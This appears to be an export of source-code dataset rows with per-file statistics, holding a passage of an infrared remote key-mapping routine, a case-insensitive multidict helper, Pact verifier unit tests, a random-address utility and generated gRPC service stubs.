globalVariable.IRK_MAP['MUTE'] = int(mute_code.strip(), 16)
globalVariable.IRK_MAP['SUB'] = int(subt_code.strip(), 16)
#globalVariable.IRK_MAP['V.Format'] = int(vformat_code.strip(), 16)
globalVariable.IRK_MAP['ZOOM'] = int(zoom_code.strip(), 16)
globalVariable.IRK_MAP['TTX/CC'] = int(ttx_code.strip(), 16)
globalVariable.IRK_MAP['FAV'] = int(pav_code.strip(), 16)
#globalVariable.IRK_MAP['FIND'] = int(find_code.strip(), 16)
globalVariable.IRK_MAP['Play'] = int(play_code.strip(), 16)
globalVariable.IRK_MAP['Pause'] = int(pause_code.strip(), 16)
globalVariable.IRK_MAP['Stop'] = int(stop_code.strip(), 16)
globalVariable.IRK_MAP['<<'] = int(qback_code.strip(), 16)
globalVariable.IRK_MAP['>>'] = int(qplay_code.strip(), 16)
globalVariable.IRK_MAP['Rec'] = int(rpoint_code.strip(), 16)
#globalVariable.IRK_MAP['BSTART'] = int(bstart_code.strip(), 16)
elif section=='SaiKeDa':
sys_code = self.parseConfigItem(self.section,'System').split(':')[0]
mute_code = self.parseConfigItem(self.section,'MUTE').split(':')[0]
power_code = self.parseConfigItem(self.section,'POWER').split(':')[0]
code_1 = self.parseConfigItem(self.section,'1').split(':')[0]
code_2 = self.parseConfigItem(self.section,'2').split(':')[0]
code_3 = self.parseConfigItem(self.section,'3').split(':')[0]
code_4 = self.parseConfigItem(self.section,'4').split(':')[0]
code_5 = self.parseConfigItem(self.section,'5').split(':')[0]
code_6 = self.parseConfigItem(self.section,'6').split(':')[0]
code_7 = self.parseConfigItem(self.section,'7').split(':')[0]
code_8 = self.parseConfigItem(self.section,'8').split(':')[0]
code_9 = self.parseConfigItem(self.section,'9').split(':')[0]
code_0 = self.parseConfigItem(self.section,'0').split(':')[0]
audchl_code = self.parseConfigItem(self.section,'AUDCHL').split(':')[0]
vod_code = self.parseConfigItem(self.section,'VOD').split(':')[0]
up_code = self.parseConfigItem(self.section,'UP').split(':')[0]
dn_code = self.parseConfigItem(self.section,'DOWN').split(':')[0]
left_code = self.parseConfigItem(self.section,'LEFT').split(':')[0]
right_code = self.parseConfigItem(self.section,'RIGHT').split(':')[0]
ok_code = self.parseConfigItem(self.section,'OK').split(':')[0]
zhixun_code = self.parseConfigItem(self.section,'ZhiXun').split(':')[0]
back_code = self.parseConfigItem(self.section,'BACK').split(':')[0]
menu_code = self.parseConfigItem(self.section,'MENU').split(':')[0]
exit_code = self.parseConfigItem(self.section,'EXIT').split(':')[0]
red_code = self.parseConfigItem(self.section,'RED').split(':')[0]
green_code = self.parseConfigItem(self.section,'GREEN').split(':')[0]
yellow_code = self.parseConfigItem(self.section,'YELLOW').split(':')[0]
blue_code = self.parseConfigItem(self.section,'BLUE').split(':')[0]
mail_code = self.parseConfigItem(self.section,'MAIL').split(':')[0]
stock_code = self.parseConfigItem(self.section,'STOCK').split(':')[0]
fav_code = self.parseConfigItem(self.section,'FAV').split(':')[0]
pgup_code = self.parseConfigItem(self.section,'PgUP').split(':')[0]
pgdn_code = self.parseConfigItem(self.section,'PgDN').split(':')[0]
radio_code = self.parseConfigItem(self.section,'RADIO').split(':')[0]
vol_plus_code = self.parseConfigItem(self.section,'Vol+').split(':')[0]
vol_minus_code = self.parseConfigItem(self.section,'Vol-').split(':')[0]
tv_code = self.parseConfigItem(self.section,'TV').split(':')[0]
epg_code = self.parseConfigItem(self.section,'EPG').split(':')[0]
book_code = self.parseConfigItem(self.section,'BOOK').split(':')[0]
info_code = self.parseConfigItem(self.section,'Info').split(':')[0]
globalVariable.IRK_MAP['System'] = int(sys_code.strip(), 16)
globalVariable.IRK_MAP['POWER'] = int(power_code.strip(), 16)
globalVariable.IRK_MAP['1'] = int(code_1.strip(), 16)
globalVariable.IRK_MAP['2'] = int(code_2.strip(), 16)
globalVariable.IRK_MAP['3'] = int(code_3.strip(), 16)
globalVariable.IRK_MAP['4'] = int(code_4.strip(), 16)
globalVariable.IRK_MAP['5'] = int(code_5.strip(), 16)
globalVariable.IRK_MAP['6'] = int(code_6.strip(), 16)
globalVariable.IRK_MAP['7'] = int(code_7.strip(), 16)
globalVariable.IRK_MAP['8'] = int(code_8.strip(), 16)
globalVariable.IRK_MAP['9'] = int(code_9.strip(), 16)
globalVariable.IRK_MAP['0'] = int(code_0.strip(), 16)
globalVariable.IRK_MAP['AUDCHL'] = int(audchl_code.strip(), 16)
globalVariable.IRK_MAP['VOD'] = int(vod_code.strip(), 16)
globalVariable.IRK_MAP['UP'] = int(up_code.strip(), 16)
globalVariable.IRK_MAP['DOWN'] = int(dn_code.strip(), 16)
globalVariable.IRK_MAP['LEFT'] = int(left_code.strip(), 16)
globalVariable.IRK_MAP['RIGHT'] = int(right_code.strip(), 16)
globalVariable.IRK_MAP['OK'] = int(ok_code.strip(), 16)
globalVariable.IRK_MAP['ZhiXun'] = int(zhixun_code.strip(), 16)
globalVariable.IRK_MAP['BACK'] = int(back_code.strip(), 16)
globalVariable.IRK_MAP['MENU'] = int(menu_code.strip(), 16)
globalVariable.IRK_MAP['EXIT'] = int(exit_code.strip(), 16)
globalVariable.IRK_MAP['RED'] = int(red_code.strip(), 16)
globalVariable.IRK_MAP['GREEN'] = int(green_code.strip(), 16)
globalVariable.IRK_MAP['YELLOW'] = int(yellow_code.strip(), 16)
globalVariable.IRK_MAP['BLUE'] = int(blue_code.strip(), 16)
globalVariable.IRK_MAP['MAIL'] = int(mail_code.strip(), 16)
globalVariable.IRK_MAP['STOCK'] = int(stock_code.strip(), 16)
globalVariable.IRK_MAP['FAV'] = int(fav_code.strip(), 16)
globalVariable.IRK_MAP['PgUP'] = int(pgup_code.strip(), 16)
globalVariable.IRK_MAP['PgDN'] = int(pgdn_code.strip(), 16)
globalVariable.IRK_MAP['RADIO'] = int(radio_code.strip(), 16)
globalVariable.IRK_MAP['VOL+'] = int(vol_plus_code.strip(), 16)
globalVariable.IRK_MAP['VOL-'] = int(vol_minus_code.strip(), 16)
globalVariable.IRK_MAP['TV'] = int(tv_code.strip(), 16)
globalVariable.IRK_MAP['BOOK'] = int(book_code.strip(), 16)
globalVariable.IRK_MAP['Info'] = int(info_code.strip(), 16)
globalVariable.IRK_MAP['EPG'] = int(epg_code.strip(), 16)
| 64.06501
| 87
| 0.586044
| 3,874
| 33,506
| 4.896489
| 0.037429
| 0.122937
| 0.282355
| 0.324213
| 0.937213
| 0.913807
| 0.890822
| 0.890242
| 0.844589
| 0.842322
| 0
| 0.030219
| 0.234585
| 33,506
| 522
| 88
| 64.187739
| 0.709428
| 0.086014
| 0
| 0.637037
| 0
| 0
| 0.053684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.007407
| null | null | 0.002469
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1dd991145324aac9dda1391b164147beb23eeadb
| 6,973
|
py
|
Python
|
src/hio/help/hicting.py
|
pfeairheller/hio
|
44669adb62c81357491f9f6157312bc1313b56cf
|
[
"Apache-2.0"
] | 1
|
2021-04-07T19:10:28.000Z
|
2021-04-07T19:10:28.000Z
|
src/hio/help/hicting.py
|
pfeairheller/hio
|
44669adb62c81357491f9f6157312bc1313b56cf
|
[
"Apache-2.0"
] | 4
|
2021-03-30T20:50:19.000Z
|
2022-01-06T17:16:18.000Z
|
src/hio/help/hicting.py
|
pfeairheller/hio
|
44669adb62c81357491f9f6157312bc1313b56cf
|
[
"Apache-2.0"
] | 3
|
2021-04-08T19:35:36.000Z
|
2021-06-03T13:39:05.000Z
|
# -*- encoding: utf-8 -*-
"""
hio.help.hicting module
"""
from multidict import MultiDict, CIMultiDict
from orderedset import OrderedSet as oset
class Hict(CIMultiDict):
"""
Hict is a Case Insensitive Keyed Multiple valued dictionary like class that
extends CIMultiDict and is used for HTTP headers which have case insentive
labels.
Insertion order of keys preserved.
Associated with each key is a valuelist i.e. a list of values for that key.
https://multidict.readthedocs.io/en/stable/
CIMultiDict keys must be subclass of str no ints allowed
In CIMultiDict:
.add(key,value) appends value to the valuelist at key
m["key"] = value replaces the valuelist at key with [value]
m["key"] returns the first added element of the valuelist at key
MultiDict methods access values in FIFO order
Hict adds method to access values in LIFO order
Extended methods in Hict but not in CIMultiDict are:
nabone(key [,default]) get last value at key else default or KeyError
nab(key [,default]) get last value at key else default or None
naball(key [,default]) get all values inverse order else default or KeyError
firsts() get all items where item value is first inserted value at key
lasts() get all items where item value is last insterted value at key
"""
def __repr__(self):
return "{}({})".format(self.__class__.__name__, list(self.items()))
def nabone(self, key, *pa, **kwa):
"""
Usage:
.nabone(key [, default])
returns last value at key if key in dict else default
raises KeyError if key not in dict and default not provided.
"""
try:
return self.getall(key)[-1]
except KeyError:
if not pa and "default" not in kwa:
raise
elif pa:
return pa[0]
else:
return kwa["default"]
def nab(self, key, *pa, **kwa):
"""
Usage:
.nab(key [, default])
returns last value at key if key in dict else default
returns None if key not in dict and default not provided.
"""
try:
return self.getall(key)[-1]
except KeyError:
if not pa and "default" not in kwa:
return None
elif pa:
return pa[0]
else:
return kwa["default"]
def naball(self, key, *pa, **kwa):
"""
Usage:
.nabone(key [, default])
returns list of values at key if key in dict else default
raises KeyError if key not in dict and default not provided.
"""
try:
# getall returns copy of list so safe to reverse
return list(reversed(self.getall(key)))
except KeyError:
if not pa and "default" not in kwa:
raise
elif pa:
return pa[0]
else:
return kwa["default"]
def firsts(self):
"""
Returns list of (key, value) pair where each value is first value at key
but with no duplicate keys. MultiDict .keys() returns a key for each
duplicate value
"""
keys = oset(self.keys()) # get rid of duplicates provided by .keys()
return [(k, self.getone(k)) for k in keys]
def lasts(self):
"""
Returns list of (key, value) pairs where each value is last value at key
but with no duplicate keys. MultiDict .keys() returns a key for each
duplicate value
"""
keys = oset(self.keys()) # get rid of duplicates provided by .keys()
return [(k, self.nabone(k)) for k in keys]
class Mict(MultiDict):
"""
Mict is a multiple valued dictionary like class that extends MultiDict.
Insertion order of keys preserved.
Associated with each key is a valuelist i.e. a list of values for that key.
https://multidict.readthedocs.io/en/stable/
MultiDict keys must be subclass of str no ints allowed
In MultiDict:
.add(key,value) appends value to the valuelist at key
m["key"] = value replaces the valuelist at key with [value]
m["key"] returns the first added element of the valuelist at key
MultiDict methods access values in FIFO order
Mict adds methods to access values in LIFO order
Extended methods in Mict but not in MultiDict are:
nabone(key [,default]) get last value at key else default or KeyError
nab(key [,default]) get last value at key else default or None
naball(key [,default]) get all values inverse order else default or KeyError
"""
def __repr__(self):
return "{}({})".format(self.__class__.__name__, list(self.items()))
def nabone(self, key, *pa, **kwa):
"""
Usage:
.nabone(key [, default])
returns last value at key if key in dict else default
raises KeyError if key not in dict and default not provided.
"""
try:
return self.getall(key)[-1]
except KeyError:
if not pa and "default" not in kwa:
raise
elif pa:
return pa[0]
else:
return kwa["default"]
def nab(self, key, *pa, **kwa):
"""
Usage:
.nab(key [, default])
returns last value at key if key in dict else default
returns None if key not in dict and default not provided.
"""
try:
return self.getall(key)[-1]
except KeyError:
if not pa and "default" not in kwa:
return None
elif pa:
return pa[0]
else:
return kwa["default"]
def naball(self, key, *pa, **kwa):
"""
Usage:
.nabone(key [, default])
returns list of values at key if key in dict else default
raises KeyError if key not in dict and default not provided.
"""
try:
# getall returns copy of list so safe to reverse
return list(reversed(self.getall(key)))
except KeyError:
if not pa and "default" not in kwa:
raise
elif pa:
return pa[0]
else:
return kwa["default"]
def firsts(self):
"""
Returns list of (key, value) pair where each value is first value at key
No duplicate keys
"""
keys = oset(self.keys()) # get rid of duplicates provided by .keys()
return [(k, self.getone(k)) for k in keys]
def lasts(self):
"""
Returns list of (key, value) pairs where each value is last value at key
No duplicate keys
"""
keys = oset(self.keys()) # get rid of duplicates provided by .keys()
return [(k, self.nabone(k)) for k in keys]
| 32.133641
| 83
| 0.576509
| 926
| 6,973
| 4.315335
| 0.149028
| 0.027528
| 0.035035
| 0.035035
| 0.894895
| 0.894895
| 0.894895
| 0.859359
| 0.859359
| 0.838338
| 0
| 0.002403
| 0.343468
| 6,973
| 216
| 84
| 32.282407
| 0.870467
| 0.527176
| 0
| 0.95
| 0
| 0
| 0.035556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.025
| 0.025
| 0.525
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
1de6f11b3b57e2e4c30c72d3f68ee4103ec1d6ad
| 150
|
py
|
Python
|
scripts/__init__.py
|
atlefren/ToPHR
|
b6c5526894c29a59660cb941da0d6f7234f1e24b
|
[
"MIT"
] | null | null | null |
scripts/__init__.py
|
atlefren/ToPHR
|
b6c5526894c29a59660cb941da0d6f7234f1e24b
|
[
"MIT"
] | null | null | null |
scripts/__init__.py
|
atlefren/ToPHR
|
b6c5526894c29a59660cb941da0d6f7234f1e24b
|
[
"MIT"
] | null | null | null |
from tilemill import generate_mbtiles
from tilemill import generate
from tilemill import get_tilemill_projects
from tilemill import TileMillException
| 30
| 42
| 0.893333
| 19
| 150
| 6.894737
| 0.421053
| 0.366412
| 0.549618
| 0.396947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 150
| 4
| 43
| 37.5
| 0.977612
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
3822e46215133712b8a8e5b2587cc1f9c26eafae
| 11,999
|
py
|
Python
|
tests/test_verifier.py
|
jnfang/pact-python
|
c4fe4220d1a4e26c939ed0dc4cd977e82183cdb3
|
[
"MIT"
] | null | null | null |
tests/test_verifier.py
|
jnfang/pact-python
|
c4fe4220d1a4e26c939ed0dc4cd977e82183cdb3
|
[
"MIT"
] | null | null | null |
tests/test_verifier.py
|
jnfang/pact-python
|
c4fe4220d1a4e26c939ed0dc4cd977e82183cdb3
|
[
"MIT"
] | null | null | null |
from collections import OrderedDict
from unittest import TestCase
import unittest
from mock import patch
from pact.verifier import Verifier
from pact.verify_wrapper import VerifyWrapper
def assertVerifyCalled(mock_wrapper, *pacts, **options):
tc = unittest.TestCase()
tc.assertEqual(mock_wrapper.call_count, 1)
mock_wrapper.assert_called_once_with(*pacts, **options)
class VerifierPactsTestCase(TestCase):
def setUp(self):
super(VerifierPactsTestCase, self).setUp()
self.addCleanup(patch.stopall)
self.verifier = Verifier(provider='test_provider',
provider_base_url="http://localhost:8888")
self.mock_wrapper = patch.object(
VerifyWrapper, 'call_verify').start()
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
@patch('pact.verifier.path_exists', return_value=True)
def test_verifier_with_provider_and_files(self, mock_path_exists, mock_wrapper):
mock_wrapper.return_value = (True, 'some logs')
output, _ = self.verifier.verify_pacts('path/to/pact1',
'path/to/pact2',
headers=['header1', 'header2'])
assertVerifyCalled(mock_wrapper,
'path/to/pact1',
'path/to/pact2',
provider='test_provider',
custom_provider_headers=['header1', 'header2'],
provider_base_url='http://localhost:8888',
log_level='INFO',
verbose=False,
enable_pending=False,
include_wip_pacts_since=None)
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
@patch('pact.verifier.path_exists', return_value=True)
def test_verifier_with_provider_and_files_passes_consumer_selctors(self, mock_path_exists, mock_wrapper):
mock_wrapper.return_value = (True, 'some logs')
output, _ = self.verifier.verify_pacts(
'path/to/pact1',
'path/to/pact2',
headers=['header1', 'header2'],
consumer_version_selectors=[
# Using OrderedDict for the sake of testing
OrderedDict([("tag", "main"), ("latest", True)]),
OrderedDict([("tag", "test"), ("latest", False)]),
]
)
assertVerifyCalled(mock_wrapper,
'path/to/pact1',
'path/to/pact2',
provider='test_provider',
custom_provider_headers=['header1', 'header2'],
provider_base_url='http://localhost:8888',
log_level='INFO',
verbose=False,
enable_pending=False,
include_wip_pacts_since=None,
consumer_selectors=['{"tag": "main", "latest": true}',
'{"tag": "test", "latest": false}'])
def test_validate_on_publish_results(self):
self.assertRaises(Exception, self.verifier.verify_pacts, 'path/to/pact1', publish=True)
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
@patch('pact.verifier.path_exists', return_value=True)
def test_publish_on_success(self, mock_path_exists, mock_wrapper):
mock_wrapper.return_value = (True, 'some logs')
output, _ = self.verifier.verify_pacts('path/to/pact1', publish_version='1.0.0')
assertVerifyCalled(mock_wrapper,
'path/to/pact1',
provider='test_provider',
provider_base_url='http://localhost:8888',
log_level='INFO',
verbose=False,
provider_app_version='1.0.0',
enable_pending=False,
include_wip_pacts_since=None)
@patch('pact.verifier.path_exists', return_value=False)
def test_raises_error_on_missing_pact_files(self, mock_path_exists):
self.assertRaises(Exception,
self.verifier.verify_pacts,
'path/to/pact1', 'path/to/pact2')
mock_path_exists.assert_called_with('path/to/pact2')
@patch("pact.verify_wrapper.VerifyWrapper.call_verify", return_value=(0, None))
@patch('pact.verifier.expand_directories', return_value=['./pacts/pact1', './pacts/pact2'])
@patch('pact.verifier.path_exists', return_value=True)
def test_expand_directories_called_for_pacts(self, mock_path_exists, mock_expand_dir, mock_wrapper):
output, _ = self.verifier.verify_pacts('path/to/pact1',
'path/to/pact2')
mock_expand_dir.assert_called_once()
@patch('pact.verify_wrapper.VerifyWrapper.call_verify', return_value=(0, None))
def test_passes_enable_pending_flag_value(self, mock_wrapper):
for value in (True, False):
with self.subTest(value=value):
with patch('pact.verifier.path_exists'):
self.verifier.verify_pacts('any.json', enable_pending=value)
self.assertTrue(
('enable_pending', value) in mock_wrapper.call_args.kwargs.items(),
mock_wrapper.call_args.kwargs,
)
@patch('pact.verify_wrapper.VerifyWrapper.call_verify', return_value=(0, None))
@patch('pact.verifier.path_exists', return_value=True)
def test_passes_include_wip_pacts_since_value(self, mock_path_exists, mock_wrapper):
self.verifier.verify_pacts('any.json', include_wip_pacts_since='2018-01-01')
self.assertTrue(
('include_wip_pacts_since', '2018-01-01') in mock_wrapper.call_args.kwargs.items(),
mock_wrapper.call_args.kwargs,
)
class VerifierBrokerTestCase(TestCase):
def setUp(self):
super(VerifierBrokerTestCase, self).setUp()
self.addCleanup(patch.stopall)
self.verifier = Verifier(provider='test_provider',
provider_base_url="http://localhost:8888")
self.mock_wrapper = patch.object(
VerifyWrapper, 'call_verify').start()
self.broker_username = 'broker_username'
self.broker_password = 'broker_password'
self.broker_url = 'http://broker'
self.default_opts = {
'broker_username': self.broker_username,
'broker_password': self.broker_password,
'broker_url': self.broker_url,
'broker_token': 'token'
}
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
def test_verifier_with_broker(self, mock_wrapper):
mock_wrapper.return_value = (True, 'some value')
output, _ = self.verifier.verify_with_broker(**self.default_opts)
self.assertTrue(output)
assertVerifyCalled(mock_wrapper,
provider='test_provider',
provider_base_url='http://localhost:8888',
broker_password=self.broker_password,
broker_username=self.broker_username,
broker_token='token',
broker_url=self.broker_url,
log_level='INFO',
verbose=False,
enable_pending=False,
include_wip_pacts_since=None)
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
def test_verifier_and_pubish_with_broker(self, mock_wrapper):
mock_wrapper.return_value = (True, 'some value')
self.default_opts['publish_version'] = '1.0.0'
output, _ = self.verifier.verify_with_broker(**self.default_opts)
self.assertTrue(output)
assertVerifyCalled(mock_wrapper,
provider='test_provider',
provider_base_url='http://localhost:8888',
broker_password=self.broker_password,
broker_username=self.broker_username,
broker_token='token',
broker_url=self.broker_url,
log_level='INFO',
verbose=False,
enable_pending=False,
include_wip_pacts_since=None,
provider_app_version='1.0.0',
)
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
def test_verifier_with_broker_passes_consumer_selctors(self, mock_wrapper):
mock_wrapper.return_value = (True, 'some value')
output, _ = self.verifier.verify_with_broker(
consumer_version_selectors=[
# Using OrderedDict for the sake of testing
OrderedDict([("tag", "main"), ("latest", True)]),
OrderedDict([("tag", "test"), ("latest", False)]),
],
**self.default_opts
)
self.assertTrue(output)
assertVerifyCalled(mock_wrapper,
provider='test_provider',
provider_base_url='http://localhost:8888',
broker_password=self.broker_password,
broker_username=self.broker_username,
broker_token='token',
broker_url=self.broker_url,
log_level='INFO',
verbose=False,
enable_pending=False,
include_wip_pacts_since=None,
consumer_selectors=['{"tag": "main", "latest": true}',
'{"tag": "test", "latest": false}'])
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
@patch('pact.verifier.path_exists', return_value=True)
def test_publish_on_success(self, mock_path_exists, mock_wrapper):
mock_wrapper.return_value = (True, 'some logs')
self.verifier.verify_with_broker(publish_version='1.0.0', **self.default_opts)
assertVerifyCalled(mock_wrapper,
provider='test_provider',
provider_base_url='http://localhost:8888',
broker_password=self.broker_password,
broker_username=self.broker_username,
broker_token='token',
broker_url=self.broker_url,
log_level='INFO',
verbose=False,
provider_app_version='1.0.0',
enable_pending=False,
include_wip_pacts_since=None)
@patch('pact.verify_wrapper.VerifyWrapper.call_verify', return_value=(0, None))
def test_passes_enable_pending_flag_value(self, mock_wrapper):
for value in (True, False):
with self.subTest(value=value):
with patch('pact.verifier.path_exists'):
self.verifier.verify_with_broker(enable_pending=value)
self.assertTrue(
('enable_pending', value) in mock_wrapper.call_args.kwargs.items(),
mock_wrapper.call_args.kwargs,
)
@patch('pact.verify_wrapper.VerifyWrapper.call_verify', return_value=(0, None))
@patch('pact.verifier.path_exists', return_value=True)
def test_passes_include_wip_pacts_since_value(self, mock_path_exists, mock_wrapper):
self.verifier.verify_with_broker(include_wip_pacts_since='2018-01-01')
self.assertTrue(
('include_wip_pacts_since', '2018-01-01') in mock_wrapper.call_args.kwargs.items(),
mock_wrapper.call_args.kwargs,
)
| 45.279245
| 109
| 0.572964
| 1,195
| 11,999
| 5.438494
| 0.098745
| 0.06601
| 0.049546
| 0.040006
| 0.878597
| 0.840591
| 0.816741
| 0.816741
| 0.810125
| 0.807047
| 0
| 0.014572
| 0.32511
| 11,999
| 264
| 110
| 45.450758
| 0.787972
| 0.006917
| 0
| 0.715596
| 0
| 0
| 0.168471
| 0.072862
| 0
| 0
| 0
| 0
| 0.09633
| 1
| 0.077982
| false
| 0.055046
| 0.027523
| 0
| 0.114679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
69af6d6b1260c91f611e0b1c6330db25070cc803
| 146
|
py
|
Python
|
raiden_contracts/tests/utils/address.py
|
konradkonrad/raiden-contracts
|
5726f744e8d7e80f7ca61401bd3f1084de57e30c
|
[
"MIT"
] | null | null | null |
raiden_contracts/tests/utils/address.py
|
konradkonrad/raiden-contracts
|
5726f744e8d7e80f7ca61401bd3f1084de57e30c
|
[
"MIT"
] | null | null | null |
raiden_contracts/tests/utils/address.py
|
konradkonrad/raiden-contracts
|
5726f744e8d7e80f7ca61401bd3f1084de57e30c
|
[
"MIT"
] | null | null | null |
import random
import string
def make_address():
return bytes(''.join(random.choice(string.printable) for _ in range(20)), encoding='utf-8')
| 20.857143
| 95
| 0.726027
| 21
| 146
| 4.952381
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023622
| 0.130137
| 146
| 6
| 96
| 24.333333
| 0.795276
| 0
| 0
| 0
| 0
| 0
| 0.034247
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0.25
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
69e194c8eca5147e6fc58f11b68e71d6b70c3643
| 45,350
|
py
|
Python
|
speaker/system_pb2_grpc.py
|
mratajsky/speaker
|
56fe584f42661463b6a85587d8b10783d511fd89
|
[
"MIT"
] | null | null | null |
speaker/system_pb2_grpc.py
|
mratajsky/speaker
|
56fe584f42661463b6a85587d8b10783d511fd89
|
[
"MIT"
] | null | null | null |
speaker/system_pb2_grpc.py
|
mratajsky/speaker
|
56fe584f42661463b6a85587d8b10783d511fd89
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from speaker import system_pb2 as speaker_dot_system__pb2
class DeviceStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetInfo = channel.unary_unary(
'/Device/GetInfo',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.DeviceInfo.FromString,
)
self.SetName = channel.unary_unary(
'/Device/SetName',
request_serializer=speaker_dot_system__pb2.DeviceName.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
class DeviceServicer(object):
"""Missing associated documentation comment in .proto file"""
def GetInfo(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetName(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DeviceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetInfo': grpc.unary_unary_rpc_method_handler(
servicer.GetInfo,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.DeviceInfo.SerializeToString,
),
'SetName': grpc.unary_unary_rpc_method_handler(
servicer.SetName,
request_deserializer=speaker_dot_system__pb2.DeviceName.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Device', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Device(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def GetInfo(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Device/GetInfo',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.DeviceInfo.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetName(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Device/SetName',
speaker_dot_system__pb2.DeviceName.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
class ReaderStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetInputList = channel.unary_stream(
'/Reader/GetInputList',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.InputInfo.FromString,
)
self.GetStatus = channel.unary_unary(
'/Reader/GetStatus',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.ReaderStatus.FromString,
)
self.SetMute = channel.unary_unary(
'/Reader/SetMute',
request_serializer=speaker_dot_system__pb2.MuteValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetVolume = channel.unary_unary(
'/Reader/SetVolume',
request_serializer=speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
class ReaderServicer(object):
"""Missing associated documentation comment in .proto file"""
def GetInputList(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetStatus(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetMute(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetVolume(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ReaderServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetInputList': grpc.unary_stream_rpc_method_handler(
